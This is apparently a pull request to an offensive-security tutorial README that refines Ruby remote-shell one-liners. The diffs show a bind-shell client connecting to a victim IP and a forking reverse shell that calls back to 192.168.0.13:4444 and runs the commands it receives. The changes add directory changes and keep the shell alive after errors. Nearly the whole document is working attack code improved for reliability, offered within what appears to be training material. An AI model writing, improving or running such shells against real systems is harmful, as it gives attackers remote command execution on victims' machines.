### PR TITLE
Improve some remote shell

### DIFF
--- a/module-0x2-or-system-kung-fu/remote-shell/README.md
+++ b/module-0x2-or-system-kung-fu/remote-shell/README.md
@@ -9,7 +9,7 @@ Remote shell means s forward or reverse connection to the target system command-
 from terminal
 
 ```ruby
-ruby -rsocket -e's=TCPSocket.new("VictimIP",4444);loop{gets.chomp!;$_=="exit"?(s.close;exit):(s.puts$_);puts s.recv 0xFFFF}'
+ruby -rsocket -e's=TCPSocket.new("127.0.0.1",4444)loop{gets.chomp!;(s.close;exit!) if $_=="exit";(s.puts$_);puts s.recv_nonblock(0xFFFF) rescue nil}'
 ```
 
 since `192.168.0.15` is the victim IP

--- a/module-0x2-or-system-kung-fu/remote-shell/README.md
+++ b/module-0x2-or-system-kung-fu/remote-shell/README.md
@@ -9,7 +9,7 @@ Remote shell means s forward or reverse connection to the target system command-
 from terminal
 
 ```ruby
-ruby -rsocket -e's=TCPSocket.new("127.0.0.1",4444)loop{gets.chomp!;(s.close;exit!) if $_=="exit";(s.puts$_);puts s.recv_nonblock(0xFFFF) rescue nil}'
+ruby -rsocket -e's=TCPSocket.new("127.0.0.1",4444);loop{gets.chomp!;(s.close;exit!) if $_=="exit";(s.puts$_);puts s.recv_nonblock(0xFFFF) rescue nil}'
 ```
 
 since `192.168.0.15` is the victim IP

--- a/module-0x2-or-system-kung-fu/remote-shell/README.md
+++ b/module-0x2-or-system-kung-fu/remote-shell/README.md
@@ -9,7 +9,7 @@ Remote shell means s forward or reverse connection to the target system command-
 from terminal
 
 ```ruby
-ruby -rsocket -e's=TCPSocket.new("VictimIP",4444);loop do;cmd=gets.chomp;s.puts cmd;s.close if cmd=="exit";puts s.recv(1000000);end'
+ruby -rsocket -e's=TCPSocket.new("VictimIP",4444);loop{gets.chomp!;$_=="exit"?(s.close;exit):(s.puts$_);puts s.recv 0xFFFF}'
 ```
 
 since `192.168.0.15` is the victim IP

--- a/module-0x2-or-system-kung-fu/remote-shell/README.md
+++ b/module-0x2-or-system-kung-fu/remote-shell/README.md
@@ -25,7 +25,7 @@ ruby -rsocket -e's=TCPSocket.open("192.168.0.13",4444).to_i;exec sprintf("/bin/s
 if you don't want to rely on `/bin/sh`
 
 ```ruby
-ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.0.13","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
+ruby -rsocket -e'exit if fork;c=TCPSocket.new("192.168.0.13",4444);loop{c.gets.chomp!;($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))rescue c.puts "failed: #{$_}"}'
 ```
 
 if you don't want to rely on `cmd.exe`


### PR DESCRIPTION
Now the reverse shell supports the "cd" command and maintains persistence when an error is raised.
Remove some useless bytes from bind shell and now when you run "exit", the program will actually exit.